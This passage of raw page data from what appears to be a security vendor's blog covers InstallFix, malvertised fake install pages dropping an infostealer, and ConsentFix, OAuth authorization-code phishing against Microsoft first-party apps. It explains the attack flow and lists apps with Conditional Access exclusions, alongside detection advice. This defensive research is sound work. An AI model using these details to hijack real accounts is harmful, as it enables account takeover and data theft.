InstallFix pages targeting both the Claude Code docs page (as opposed to the quickstart guide) and NotebookLM, a research and note taking tool from Google. New IoCs have been added accordingly, but this campaign is moving very quickly, so the list won't stay up to date for long. ",[],{},"installfix insight box 5",{"sys":22265,"__typename":1740,"content":22266,"name":22297,"title":59},{"id":9806},{"json":22267},{"data":22268,"content":22269,"nodeType":856},{},[22270,22290],{"data":22271,"content":22272,"nodeType":860},{},[22273,22277,22286],{"data":22274,"marks":22275,"value":22276,"nodeType":864},{},[],"Feeling *Fix fatigue? Us too. But we felt the naming appropriate to indicate that this is part of the same family of techniques. ClickFix has become synonymous with ",{"data":22278,"content":22280,"nodeType":883},{"uri":22279},"https://attack.mitre.org/techniques/T1204/004/",[22281],{"data":22282,"marks":22283,"value":22285,"nodeType":864},{},[22284],{"type":1455},"Malicious Copy and Paste",{"data":22287,"marks":22288,"value":22289,"nodeType":864},{},[],", even though most lures haven’t been related to “fixing” anything for a while now. The user action is essentially the same, just the context of the lure is different. ",{"data":22291,"content":22292,"nodeType":860},{},[22293],{"data":22294,"marks":22295,"value":22296,"nodeType":864},{},[],"But while traditional ClickFix attacks need to manufacture a reason for the user to run a command: a fake CAPTCHA, a fabricated error message, a bogus system prompt — InstallFix doesn't need any of that. The pretext is simply the user wanting to install legit software.","installfix insight box 3",{"sys":22299,"__typename":18759,"title":22300,"arcadeDemoUrl":22301,"playText":22302},{"id":9879},"InstallFix clickthrough demo","https://demo.arcade.software/w9lLXrpwl5E19eQMEcPb?embed","20 secs",{"sys":22304,"__typename":1724,"title":22305,"caption":22305,"layoutMode":59,"file":22306},{"id":9885},"Comparison of the legit page and install commands versus a malicious clone",{"url":22307,"width":1736,"height":22308},"https://images.ctfassets.net/y1cdw1ablpvd/27TYctONO1xi4dAh0lBeYS/36d88361bbb6568410af6d95b829b4d8/image4.png",588,{"sys":22310,"__typename":1724,"title":22311,"caption":22311,"layoutMode":59,"file":22312},{"id":9898},"When interacting with some of the detected pages, the user is redirected back to the legitimate site, lowering suspicion",{"url":22313,"width":22314,"height":22315},"https://images.ctfassets.net/y1cdw1ablpvd/17m5qsbzkBXFHumXDG8Kur/50d42f3c42092cba3082c4221a0857b0/image1.gif",1280,720,{"sys":22317,"__typename":1724,"title":22318,"caption":59,"layoutMode":59,"file":22319},{"id":9918},"Cloned page 1",{"url":22320,"width":1736,"height":8949},"https://images.ctfassets.net/y1cdw1ablpvd/3ymf2ZJNmWE0U09oOQktzj/74984e9a094f01df4bcb661e23d58992/image2.png",{"sys":22322,"__typename":1724,"title":22323,"caption":59,"layoutMode":59,"file":22324},{"id":9924},"Cloned page lure 2",{"url":22325,"width":1736,"height":22326},"https://images.ctfassets.net/y1cdw1ablpvd/YbK5GVyftUS5G09jmdxSG/cc4c2cca40f873879d69371eab526b56/image3.png",1107,{"sys":22328,"__typename":1724,"title":22329,"caption":22330,"layoutMode":59,"file":22331},{"id":9930},"Lure 3","Google Search sponsored results for Claude Code cloned pages",{"url":22332,"width":22333,"height":22334},"https://images.ctfassets.net/y1cdw1ablpvd/3sLwOnpET892xdFyvBtzfn/956963620a9cec4bafd3b3a63f0426b0/image5.png",1915,903,{"sys":22336,"__typename":1740,"content":22337,"name":22376,"title":59},{"id":9936},{"json":22338},{"nodeType":856,"data":22339,"content":22340},{},[22341],{"nodeType":860,"data":22342,"content":22343},{},[22344,22348,22356,22360,22367,22371],{"nodeType":864,"value":22345,"marks":22346,"data":22347},"Malvertising is an extremely prevalent distribution method ",[],{},{"nodeType":883,"data":22349,"content":22350},{"uri":6923},[22351],{"nodeType":864,"value":22352,"marks":22353,"data":22355},"we've seen used extensively",[22354],{"type":1455},{},{"nodeType":864,"value":22357,"marks":22358,"data":22359}," to distribute both phishing payloads and ClickFix-style lures (including the ",[],{},{"nodeType":883,"data":22361,"content":22362},{"uri":6036},[22363],{"nodeType":864,"value":6041,"marks":22364,"data":22366},[22365],{"type":1455},{},{"nodeType":864,"value":22368,"marks":22369,"data":22370}," campaign we uncovered last year). ",[],{},{"nodeType":864,"value":22372,"marks":22373,"data":22375},"In fact, 4 in 5 ClickFix lures we intercept are accessed from search engines.",[22374],{"type":899},{},"installfix insight box 1",{"sys":22378,"__typename":1717,"type":1718,"ctaText":22379,"buttonLabel":151,"buttonColour":1721,"buttonUrl":27},{"id":9980},"Read more about stealthy attack delivery and techniques in our new report, analysing the different browser-based techniques behind in-the-wild breaches in 2026.",{"sys":22381,"__typename":1740,"content":22382,"name":22400,"title":59},{"id":10055},{"json":22383},{"nodeType":856,"data":22384,"content":22385},{},[22386,22393],{"nodeType":860,"data":22387,"content":22388},{},[22389],{"nodeType":864,"value":22390,"marks":22391,"data":22392},"Amatera is a relatively new infostealer used by cybercriminals to steal sensitive data, such as browser saved passwords, cookies, session tokens, and general system information. It started appearing publicly around 2025 and is considered an evolution of an older malware family called ACR Stealer, and is sold via subscription to criminal operators.",[],{},{"nodeType":860,"data":22394,"content":22395},{},[22396],{"nodeType":864,"value":22397,"marks":22398,"data":22399},"The malware uses various techniques designed to bypass AV/EDR, including direct NTSockets for C2, dynamic API resolution with WoW64 Syscalls, and multi-stage infection chains with dynamic payload delivery. Amatera communicates with its C2 server using hardcoded IP addresses belonging to legitimate CDNs, making the traffic difficult to block without disrupting legitimate services.",[],{},"installfix insight box 2",{"sys":22402,"__typename":1740,"content":22403,"name":22442,"title":59},{"id":10068},{"json":22404},{"nodeType":856,"data":22405,"content":22406},{},[22407],{"nodeType":860,"data":22408,"content":22409},{},[22410,22415,22419,22427,22430,22438],{"nodeType":864,"value":22411,"marks":22412,"data":22414},"Edit: ",[22413],{"type":899},{},{"nodeType":864,"value":22416,"marks":22417,"data":22418},"When investigating different domains, we found additional research that indicates a variety of similar payloads being distributed. Our primary focus here is on the scale of the campaign and the lure delivery technique rather than deep analysis of the malware itself. Check out ",[],{},{"nodeType":883,"data":22420,"content":22422},{"uri":22421},"https://medium.com/@maurice.fielenbach/paste-with-caution-how-a-fake-claude-code-installer-drops-a-fileless-implant-via-deserialization-a85068955c0a",[22423],{"nodeType":864,"value":22424,"marks":22425,"data":22426},"this detailed analysis for one such teardown",[],{},{"nodeType":864,"value":2232,"marks":22428,"data":22429},[],{},{"nodeType":883,"data":22431,"content":22433},{"uri":22432},"https://www.reddit.com/r/CyberSecurityAdvice/comments/1riq3zj/i_accidentally_ran_a_suspicious_curl_command_in/",[22434],{"nodeType":864,"value":22435,"marks":22436,"data":22437},"this Reddit thread",[],{},{"nodeType":864,"value":22439,"marks":22440,"data":22441}," for another example.",[],{},"installfix insight box 4",{"sys":22444,"__typename":18759,"title":22445,"arcadeDemoUrl":22446,"playText":22447},{"id":10226},"ClickFix attack evolution demo","https://demo.arcade.software/UhbkGxUUQC8xpS5z88sx?embed","2 mins",{"items":22449},[],{},"InstallFix: Weaponizing malvertised install guides  ",{"items":22453},[22454,23277,23870],{"__typename":2059,"sys":22455,"content":22457,"title":23263,"synopsis":23264,"hashTags":59,"publishedDate":23265,"slug":23266,"tagsCollection":23267,"authorsCollection":23273},{"id":22456},"4jcVFrvGBtVXpKU3gDMaa2",{"json":22458},{"data":22459,"content":22460,"nodeType":856},{},[22461,22479,22486,22492,22548,22555,22562,22565,22573,22580,22587,22641,22649,22656,22679,22686,22689,22697,22704,22711,22718,22725,22732,22739,22745,22753,22760,22779,22799,22802,22810,22817,22824,22831,22839,22858,22865,22871,22879,22899,22919,23032,23035,23043,23050,23057,23060,23068,23075,23082,23089,23156,23186,23189,23197,23204,23211,23218,23225,23251,23257],{"data":22462,"content":22463,"nodeType":860},{},[22464,22468,22475],{"data":22465,"marks":22466,"value":22467,"nodeType":864},{},[],"In December, the Push Security research team discovered and blocked a brand new attack technique that we coined ",{"data":22469,"content":22470,"nodeType":883},{"uri":6036},[22471],{"data":22472,"marks":22473,"value":6041,"nodeType":864},{},[22474],{"type":1455},{"data":22476,"marks":22477,"value":22478,"nodeType":864},{},[],". This technique merged ClickFix-style social engineering with OAuth consent phishing to hijack Microsoft accounts. ",{"data":22480,"content":22481,"nodeType":860},{},[22482],{"data":22483,"marks":22484,"value":22485,"nodeType":864},{},[],"We saw this attack running across a large network of compromised websites that attackers were injecting the malicious payload into, forming a large-scale campaign that was detected across multiple customer estates. ",{"data":22487,"content":22491,"nodeType":996},{"target":22488},{"sys":22489},{"id":22490,"type":1001,"linkType":1002},"603MWDqc9NsqkklIkfGNZN",[],{"data":22493,"content":22494,"nodeType":860},{},[22495,22499,22508,22512,22520,22523,22532,22535,22544],{"data":22496,"marks":22497,"value":22498,"nodeType":864},{},[],"ConsentFix got a pretty awesome response from the community in a very short space of time. Within days, ",{"data":22500,"content":22502,"nodeType":883},{"uri":22501},"https://www.youtube.com/watch?v=AAiiIY-Soak",[22503],{"data":22504,"marks":22505,"value":22507,"nodeType":864},{},[22506],{"type":1455},"John Hammond shared a new and improved version of the technique",{"data":22509,"marks":22510,"value":22511,"nodeType":864},{},[]," that he’d spun up in his own lab, while security researchers from ",{"data":22513,"content":22515,"nodeType":883},{"uri":22514},"https://medium.com/@nitashathakur/consentfix-poc-how-the-attack-works-end-to-end-4f8b656f977d",[22516],{"data":22517,"marks":22518,"value":13585,"nodeType":864},{},[22519],{"type":1455},{"data":22521,"marks":22522,"value":3731,"nodeType":864},{},[],{"data":22524,"content":22526,"nodeType":883},{"uri":22525},"https://www.glueckkanja.com/en/posts/2025-12-31-vulnerability-consentfix",[22527],{"data":22528,"marks":22529,"value":22531,"nodeType":864},{},[22530],{"type":1455},"Glueck Kanja",{"data":22533,"marks":22534,"value":2232,"nodeType":864},{},[],{"data":22536,"content":22538,"nodeType":883},{"uri":22537},"https://msendpointmgr.com/2026/01/08/consentfix-quickfix/",[22539],{"data":22540,"marks":22541,"value":22543,"nodeType":864},{},[22542],{"type":1455},"other individual contributors",{"data":22545,"marks":22546,"value":22547,"nodeType":864},{},[]," all shared analysis and recommendations. ",{"data":22549,"content":22550,"nodeType":860},{},[22551],{"data":22552,"marks":22553,"value":22554,"nodeType":864},{},[],"In this blog, we’re sharing some new insights on the campaign, pulling together some of the top recommendations and resources shared across the community, and predicting what the future holds for this novel technique as it quickly enters the mainstream. ",{"data":22556,"content":22557,"nodeType":860},{},[22558],{"data":22559,"marks":22560,"value":22561,"nodeType":864},{},[],"First though, let’s quickly recap what ConsentFix is and how it works. ",{"data":22563,"content":22564,"nodeType":1005},{},[],{"data":22566,"content":22567,"nodeType":1009},{},[22568],{"data":22569,"marks":22570,"value":22572,"nodeType":864},{},[22571],{"type":899},"ConsentFix 101",{"data":22574,"content":22575,"nodeType":860},{},[22576],{"data":22577,"marks":22578,"value":22579,"nodeType":864},{},[],"ConsentFix is an attack technique that prompts the victim to share an OAuth authorization code with an attacker via a phishing page. The attacker then enters this code into a target application on their own device in order to complete the authorization handshake and take over the account. ",{"data":22581,"content":22582,"nodeType":860},{},[22583],{"data":22584,"marks":22585,"value":22586,"nodeType":864},{},[],"By hijacking OAuth, attackers can effectively bypass identity-layer controls like passwords and MFA — even phishing resistant authentication methods like passkeys have no impact on this attack, because it sidesteps the authentication process altogether. ",{"data":22588,"content":22589,"nodeType":860},{},[22590,22594,22603,22606,22613,22617,22626,22630,22638],{"data":22591,"marks":22592,"value":22593,"nodeType":864},{},[],"OAuth abuse attacks are not new. Techniques like ",{"data":22595,"content":22597,"nodeType":883},{"uri":22596},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/consent_phishing/description.md",[22598],{"data":22599,"marks":22600,"value":22602,"nodeType":864},{},[22601],{"type":1455},"consent phishing",{"data":22604,"marks":22605,"value":902,"nodeType":864},{},[],{"data":22607,"content":22608,"nodeType":883},{"uri":13394},[22609],{"data":22610,"marks":22611,"value":13183,"nodeType":864},{},[22612],{"type":1455},{"data":22614,"marks":22615,"value":22616,"nodeType":864},{},[]," have been around for some time. However, these mainly focus on connecting your primary workspace account (e.g. Microsoft, Google, etc.) to a fraudulent, attacker-controlled application. But this is becoming increasingly difficult in core enterprise cloud environments like Azure due to ",{"data":22618,"content":22620,"nodeType":883},{"uri":22619},"https://learn.microsoft.com/en-us/microsoft-365/admin/misc/user-consent?view=o365-worldwide",[22621],{"data":22622,"marks":22623,"value":22625,"nodeType":864},{},[22624],{"type":1455},"stricter default configs",{"data":22627,"marks":22628,"value":22629,"nodeType":864},{},[],". That said, device code phishing still featured prominently in the recent ",{"data":22631,"content":22632,"nodeType":883},{"uri":6237},[22633],{"data":22634,"marks":22635,"value":22637,"nodeType":864},{},[22636],{"type":1455},"high-profile Salesforce attacks in 2025",{"data":22639,"marks":22640,"value":2924,"nodeType":864},{},[],{"data":22642,"content":22643,"nodeType":1312},{},[22644],{"data":22645,"marks":22646,"value":22648,"nodeType":864},{},[22647],{"type":899},"What makes ConsentFix so dangerous?",{"data":22650,"content":22651,"nodeType":860},{},[22652],{"data":22653,"marks":22654,"value":22655,"nodeType":864},{},[],"Unlike typical OAuth attacks, the novel ConsentFix approach enabled the attacker to target different types of application to what they usually go after — with big implications for detection and response. In this case, the attacker:",{"data":22657,"content":22658,"nodeType":941},{},[22659,22669],{"data":22660,"content":22661,"nodeType":945},{},[22662],{"data":22663,"content":22664,"nodeType":860},{},[22665],{"data":22666,"marks":22667,"value":22668,"nodeType":864},{},[],"Specifically targeted first-party Microsoft apps that cannot be restricted in the same way as third-party applications, and are pre-consented in every tenant (meaning users can authenticate to them without admin approval). ",{"data":22670,"content":22671,"nodeType":945},{},[22672],{"data":22673,"content":22674,"nodeType":860},{},[22675],{"data":22676,"marks":22677,"value":22678,"nodeType":864},{},[],"Leveraged legacy scopes that are outside the scope of default logging to evade detection, and targeted scopes with known Conditional Access policy exclusions.",{"data":22680,"content":22681,"nodeType":860},{},[22682],{"data":22683,"marks":22684,"value":22685,"nodeType":864},{},[],"This means that default controls you’d expect to block malicious OAuth grants don’t apply, you may not have logging enabled to detect it if it did happen to you, and to top it off, conditional access policy exclusions mean that many organizations’ expected controls don’t work as intended in this case. ",{"data":22687,"content":22688,"nodeType":1005},{},[],{"data":22690,"content":22691,"nodeType":1009},{},[22692],{"data":22693,"marks":22694,"value":22696,"nodeType":864},{},[22695],{"type":899},"ConsentFix campaign recap",{"data":22698,"content":22699,"nodeType":860},{},[22700],{"data":22701,"marks":22702,"value":22703,"nodeType":864},{},[],"Let’s quickly recap how the ConsentFix campaign was implemented. ",{"data":22705,"content":22706,"nodeType":860},{},[22707],{"data":22708,"marks":22709,"value":22710,"nodeType":864},{},[],"The victim is served a page which requires that they verify that they are human by pasting a URL into the phishing page.",{"data":22712,"content":22713,"nodeType":860},{},[22714],{"data":22715,"marks":22716,"value":22717,"nodeType":864},{},[],"Clicking the “Sign In” button opens a legitimate Microsoft login page. If the user is already logged in (which they likely are if working in their normal browser) their account information is already pre-populated and they won’t need to authenticate again. ",{"data":22719,"content":22720,"nodeType":860},{},[22721],{"data":22722,"marks":22723,"value":22724,"nodeType":864},{},[],"Selecting their account redirects them to a localhost URL containing an OAuth authorization code — this is what they then post into the original phishing page to complete the attack. ",{"data":22726,"content":22727,"nodeType":860},{},[22728],{"data":22729,"marks":22730,"value":22731,"nodeType":864},{},[],"Once the attacker gets the URL, they can exchange it for an access token or refresh token for the particular application being targeted — in this case, Azure CLI.",{"data":22733,"content":22734,"nodeType":860},{},[22735],{"data":22736,"marks":22737,"value":22738,"nodeType":864},{},[],"The TL;DR is that the attacker is manually completing an authorization flow that happens when a user logs into Azure CLI — a a command line client that provides you with the ability to easily manage your Azure AD / Entra ID environment. Except in this case, they’re taking the victim’s information to log in on the attacker’s device instead. ",{"data":22740,"content":22744,"nodeType":996},{"target":22741},{"sys":22742},{"id":22743,"type":1001,"linkType":1002},"1eZOs7hXi9FzCE92QEP6xh",[],{"data":22746,"content":22747,"nodeType":1312},{},[22748],{"data":22749,"marks":22750,"value":22752,"nodeType":864},{},[22751],{"type":899},"Latest campaign details",{"data":22754,"content":22755,"nodeType":860},{},[22756],{"data":22757,"marks":22758,"value":22759,"nodeType":864},{},[],"Since we shared our blog post, we’ve had a number of additional details come to light about the campaign, which we’ve continued to track. ",{"data":22761,"content":22762,"nodeType":860},{},[22763,22767,22775],{"data":22764,"marks":22765,"value":22766,"nodeType":864},{},[],"It appears to be linked to Russian state-affiliated APT29, as corroborated by threat researchers we’ve been collaborating with. This is consistent with the ",{"data":22768,"content":22769,"nodeType":883},{"uri":6036},[22770],{"data":22771,"marks":22772,"value":22774,"nodeType":864},{},[22773],{"type":1455},"stealthy tactics we observed",{"data":22776,"marks":22777,"value":22778,"nodeType":864},{},[],", which go far beyond the run-of-the-mill detection evasion techniques we see used in criminal phishing campaigns. ",{"data":22780,"content":22781,"nodeType":860},{},[22782,22786,22795],{"data":22783,"marks":22784,"value":22785,"nodeType":864},{},[],"It shares many similarities with, and appears to be an evolution of, ",{"data":22787,"content":22789,"nodeType":883},{"uri":22788},"https://www.volexity.com/blog/2025/12/04/dangerous-invitations-russian-threat-actor-spoofs-european-security-events-in-targeted-phishing-attacks/",[22790],{"data":22791,"marks":22792,"value":22794,"nodeType":864},{},[22793],{"type":1455},"this Russia-affiliated campaign identified by Volexity",{"data":22796,"marks":22797,"value":22798,"nodeType":864},{},[]," that featured a manual version of the attack — where they victim was social engineered via email into opening the Microsoft URL, copying the localhost response, and sending it back to the attacker via email. ",{"data":22800,"content":22801,"nodeType":1005},{},[],{"data":22803,"content":22804,"nodeType":1009},{},[22805],{"data":22806,"marks":22807,"value":22809,"nodeType":864},{},[22808],{"type":899},"Top contributions from the community",{"data":22811,"content":22812,"nodeType":860},{},[22813],{"data":22814,"marks":22815,"value":22816,"nodeType":864},{},[],"As we mentioned earlier, the community response to ConsentFix has been incredible. ",{"data":22818,"content":22819,"nodeType":860},{},[22820],{"data":22821,"marks":22822,"value":22823,"nodeType":864},{},[],"As ever, you get a lot of vendors covering the attack technique with “install our product” as the recommendation. This is to be expected, but it’s misleading when some of these vendors are pushing EDR products that would have absolutely no way of detecting or blocking the attack. ",{"data":22825,"content":22826,"nodeType":860},{},[22827],{"data":22828,"marks":22829,"value":22830,"nodeType":864},{},[],"But cutting through the marketing, a lot of really great resources and recommendations were shared. ",{"data":22832,"content":22833,"nodeType":1312},{},[22834],{"data":22835,"marks":22836,"value":22838,"nodeType":864},{},[22837],{"type":899},"V2.0 released by John Hammond",{"data":22840,"content":22841,"nodeType":860},{},[22842,22846,22854],{"data":22843,"marks":22844,"value":22845,"nodeType":864},{},[],"Within days, John Hammond ",{"data":22847,"content":22848,"nodeType":883},{"uri":22501},[22849],{"data":22850,"marks":22851,"value":22853,"nodeType":864},{},[22852],{"type":1455},"posted about ConsentFix on his Youtube channel",{"data":22855,"marks":22856,"value":22857,"nodeType":864},{},[],", where he showed off a slick improvement on the ConsentFix implementation used by attackers. In his version, the URL containing the Microsoft authorization code was generated in a pop-up browser window that could simply be drag-and-dropped into the phishing page. ",{"data":22859,"content":22860,"nodeType":860},{},[22861],{"data":22862,"marks":22863,"value":22864,"nodeType":864},{},[],"This implementation is way smoother, making it much more likely that a victim would fall for it. And this took a matter of days… ",{"data":22866,"content":22870,"nodeType":996},{"target":22867},{"sys":22868},{"id":22869,"type":1001,"linkType":1002},"59tfJDRhGThKD48Wjg7uY2",[],{"data":22872,"content":22873,"nodeType":1312},{},[22874],{"data":22875,"marks":22876,"value":22878,"nodeType":864},{},[22877],{"type":899},"Additional vulnerable first-party apps identified",{"data":22880,"content":22881,"nodeType":860},{},[22882,22886,22895],{"data":22883,"marks":22884,"value":22885,"nodeType":864},{},[],"Fabian Bader and Dirk-jan Mollema from Glueck Kanja have ",{"data":22887,"content":22889,"nodeType":883},{"uri":22888},"https://entrascopes.com/?bypass=true&authcodeFix=true",[22890],{"data":22891,"marks":22892,"value":22894,"nodeType":864},{},[22893],{"type":1455},"shared a great resource",{"data":22896,"marks":22897,"value":22898,"nodeType":864},{},[]," on wider first-party apps that are vulnerable to ConsentFix. ",{"data":22900,"content":22901,"nodeType":860},{},[22902,22906,22915],{"data":22903,"marks":22904,"value":22905,"nodeType":864},{},[],"In total, there are 11 apps vulnerable to ConsentFix that also have known ",{"data":22907,"content":22909,"nodeType":883},{"uri":22908},"https://cloudbrothers.info/conditional-access-bypasses/#documented-bypasses",[22910],{"data":22911,"marks":22912,"value":22914,"nodeType":864},{},[22913],{"type":1455},"Conditional Access exclusions",{"data":22916,"marks":22917,"value":22918,"nodeType":864},{},[]," (either for the app generally, or when specific scopes are requested for the app):",{"data":22920,"content":22921,"nodeType":941},{},[22922,22932,22942,22952,22962,22972,22982,22992,23002,23012,23022],{"data":22923,"content":22924,"nodeType":945},{},[22925],{"data":22926,"content":22927,"nodeType":860},{},[22928],{"data":22929,"marks":22930,"value":22931,"nodeType":864},{},[],"Microsoft Azure CLI: 04b07795-8ddb-461a-bbee-02f9e1bf7b46",{"data":22933,"content":22934,"nodeType":945},{},[22935],{"data":22936,"content":22937,"nodeType":860},{},[22938],{"data":22939,"marks":22940,"value":22941,"nodeType":864},{},[],"Microsoft Azure PowerShell: 1950a258-227b-4e31-a9cf-717495945fc2",{"data":22943,"content":22944,"nodeType":945},{},[22945],{"data":22946,"content":22947,"nodeType":860},{},[22948],{"data":22949,"marks":22950,"value":22951,"nodeType":864},{},[],"Microsoft Teams: 1fec8e78-bce4-4aaf-ab1b-5451cc387264",{"data":22953,"content":22954,"nodeType":945},{},[22955],{"data":22956,"content":22957,"nodeType":860},{},[22958],{"data":22959,"marks":22960,"value":22961,"nodeType":864},{},[],"Microsoft Whiteboard Client: 57336123-6e14-4acc-8dcf-287b6088aa28",{"data":22963,"content":22964,"nodeType":945},{},[22965],{"data":22966,"content":22967,"nodeType":860},{},[22968],{"data":22969,"marks":22970,"value":22971,"nodeType":864},{},[],"Microsoft Flow Mobile PROD-GCCH-CN: 57fcbcfa-7cee-4eb1-8b25-12d2030b4ee0",{"data":22973,"content":22974,"nodeType":945},{},[22975],{"data":22976,"content":22977,"nodeType":860},{},[22978],{"data":22979,"marks":22980,"value":22981,"nodeType":864},{},[],"Enterprise Roaming and Backup: 60c8bde5-3167-4f92-8fdb-059f6176dc0",{"data":22983,"content":22984,"nodeType":945},{},[22985],{"data":22986,"content":22987,"nodeType":860},{},[22988],{"data":22989,"marks":22990,"value":22991,"nodeType":864},{},[],"Visual Studio: 872cd9fa-d31f-45e0-9eab-6e460a02d1f1",{"data":22993,"content":22994,"nodeType":945},{},[22995],{"data":22996,"content":22997,"nodeType":860},{},[22998],{"data":22999,"marks":23000,"value":23001,"nodeType":864},{},[],"Aadrm Admin Powershell: 90f610bf-206d-4950-b61d-37fa6fd1b224",{"data":23003,"content":23004,"nodeType":945},{},[23005],{"data":23006,"content":23007,"nodeType":860},{},[23008],{"data":23009,"marks":23010,"value":23011,"nodeType":864},{},[],"Microsoft SharePoint Online Management Shell: 9bc3ab49-b65d-410a-85ad-de819febfddc",{"data":23013,"content":23014,"nodeType":945},{},[23015],{"data":23016,"content":23017,"nodeType":860},{},[23018],{"data":23019,"marks":23020,"value":23021,"nodeType":864},{},[],"Microsoft Power Query for Excel: a672d62c-fc7b-4e81-a576-e60dc46e951d",{"data":23023,"content":23024,"nodeType":945},{},[23025],{"data":23026,"content":23027,"nodeType":860},{},[23028],{"data":23029,"marks":23030,"value":23031,"nodeType":864},{},[],"Visual Studio Code: aebc6443-996d-45c2-90f0-388ff96faa56",{"data":23033,"content":23034,"nodeType":1005},{},[],{"data":23036,"content":23037,"nodeType":1009},{},[23038],{"data":23039,"marks":23040,"value":23042,"nodeType":864},{},[23041],{"type":899},"Predictions for ConsentFix",{"data":23044,"content":23045,"nodeType":860},{},[23046],{"data":23047,"marks":23048,"value":23049,"nodeType":864},{},[],"Based on the speed at which new iterations on the ConsentFix technique were shared by security researchers, and the breadth of apps and possible scopes that can be leveraged, both red teams and criminals will inevitably adopt ConsentFix into their arsenal of TTPs in the near future. It is likely that new ConsentFix variants will emerge imminently (if not already in circulation). ",{"data":23051,"content":23052,"nodeType":860},{},[23053],{"data":23054,"marks":23055,"value":23056,"nodeType":864},{},[],"All security teams responsible for protecting Microsoft environments should ensure that monitoring controls and mitigations are put in place as a matter of high priority. ",{"data":23058,"content":23059,"nodeType":1005},{},[],{"data":23061,"content":23062,"nodeType":1009},{},[23063],{"data":23064,"marks":23065,"value":23067,"nodeType":864},{},[23066],{"type":899},"Updated recommendations for security teams",{"data":23069,"content":23070,"nodeType":860},{},[23071],{"data":23072,"marks":23073,"value":23074,"nodeType":864},{},[],"As an entirely browser-native attack technique, many traditional security tools and data sources are of limited use when it comes to detecting or pre-emptively blocking this attack. At the same time, the attack exploits default Microsoft security configs to evade both prevention and detection controls.",{"data":23076,"content":23077,"nodeType":860},{},[23078],{"data":23079,"marks":23080,"value":23081,"nodeType":864},{},[],"To be able to tackle modern attacks like ConsentFix that occur entirely within the browser context, it is vital that organizations look to monitor the browser as a detection surface, hunt for signs of malicious activity, and block attacks in real-time — in the same way that you would expect EDR to work for endpoint attacks. ",{"data":23083,"content":23084,"nodeType":860},{},[23085],{"data":23086,"marks":23087,"value":23088,"nodeType":864},{},[],"For organizations relying on Microsoft logging as the sole line of defense against this attack, there are some new recommendations to add to the list thanks to the community response: ",{"data":23090,"content":23091,"nodeType":941},{},[23092,23115,23125,23146],{"data":23093,"content":23094,"nodeType":945},{},[23095],{"data":23096,"content":23097,"nodeType":860},{},[23098,23102,23111],{"data":23099,"marks":23100,"value":23101,"nodeType":864},{},[],"Ensure that logging for the deprecated ",{"data":23103,"content":23105,"nodeType":883},{"uri":23104},"https://learn.microsoft.com/en-us/azure/azure-monitor/reference/tables/aadgraphactivitylogs",[23106],{"data":23107,"marks":23108,"value":23110,"nodeType":864},{},[23109],{"type":1455},"AADGraphActivityLogs",{"data":23112,"marks":23113,"value":23114,"nodeType":864},{},[]," is enabled.",{"data":23116,"content":23117,"nodeType":945},{},[23118],{"data":23119,"content":23120,"nodeType":860},{},[23121],{"data":23122,"marks":23123,"value":23124,"nodeType":864},{},[],"Hunt in logs for the Application IDs highlighted above, along with the Resource IDs for Windows Azure Active Directory (00000002-0000-0000-c000-000000000000) and Microsoft Intune Checkin (26a4ae64-5862-427f-a9b0-044e62572a4f)",{"data":23126,"content":23127,"nodeType":945},{},[23128],{"data":23129,"content":23130,"nodeType":860},{},[23131,23134,23142],{"data":23132,"marks":23133,"value":21,"nodeType":864},{},[],{"data":23135,"content":23136,"nodeType":883},{"uri":22537},[23137],{"data":23138,"marks":23139,"value":23141,"nodeType":864},{},[23140],{"type":1455},"Create Service Principals for each of the vulnerable apps and restrict the users that are authorized to access them",{"data":23143,"marks":23144,"value":23145,"nodeType":864},{},[]," to reduce the attack surface of users that can be phished with this method.",{"data":23147,"content":23148,"nodeType":945},{},[23149],{"data":23150,"content":23151,"nodeType":860},{},[23152],{"data":23153,"marks":23154,"value":23155,"nodeType":864},{},[],"Block access to CLI tools via Conditional Access policy and issue exclusions for authorized users/groups. ",{"data":23157,"content":23158,"nodeType":860},{},[23159,23163,23172,23176,23183],{"data":23160,"marks":23161,"value":23162,"nodeType":864},{},[],"Additional resources that may be of use include community-created ",{"data":23164,"content":23166,"nodeType":883},{"uri":23165},"https://github.com/elastic/detection-rules/pull/5485",[23167],{"data":23168,"marks":23169,"value":23171,"nodeType":864},{},[23170],{"type":1455},"Elastic detection rules",{"data":23173,"marks":23174,"value":23175,"nodeType":864},{},[]," for ConsentFix and further mitigation and hunting guidance from ",{"data":23177,"content":23178,"nodeType":883},{"uri":22525},[23179],{"data":23180,"marks":23181,"value":22531,"nodeType":864},{},[23182],{"type":1455},{"data":23184,"marks":23185,"value":10094,"nodeType":864},{},[],{"data":23187,"content":23188,"nodeType":1005},{},[],{"data":23190,"content":23191,"nodeType":1009},{},[23192],{"data":23193,"marks":23194,"value":23196,"nodeType":864},{},[23195],{"type":899},"Learn more about Push Security",{"data":23198,"content":23199,"nodeType":860},{},[23200],{"data":23201,"marks":23202,"value":23203,"nodeType":864},{},[],"Even though this was a brand new technique, Push intercepted this attack and shut it down before customers could interact with it. ",{"data":23205,"content":23206,"nodeType":860},{},[23207],{"data":23208,"marks":23209,"value":23210,"nodeType":864},{},[],"Push tackles browser-based attacks using behavioral threat detection controls, powered by deep browser telemetry, to provide broad detection and blocking capabilities against attacks happening in the browser. This means analyzing the end-to-end process of a webpage loading/running in the browser, and how the user interacts with the page, to spot universal indicators of bad activity. ",{"data":23212,"content":23213,"nodeType":860},{},[23214],{"data":23215,"marks":23216,"value":23217,"nodeType":864},{},[],"This is the only reliable way to detect malicious websites in a world where IoC-based detections are trivial for attackers to get around. Rather than playing known-bad whac-a-mole, Push detects and blocks even zero-day browser threats in real time.",{"data":23219,"content":23220,"nodeType":860},{},[23221],{"data":23222,"marks":23223,"value":23224,"nodeType":864},{},[],"Push stops browser-based attacks like AiTM phishing, credential stuffing, malicious browser extensions, ClickFix, ConsentFix, and session hijacking. You don’t need to wait until it all goes wrong either — you can also use Push to proactively find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, and more to harden your identity attack 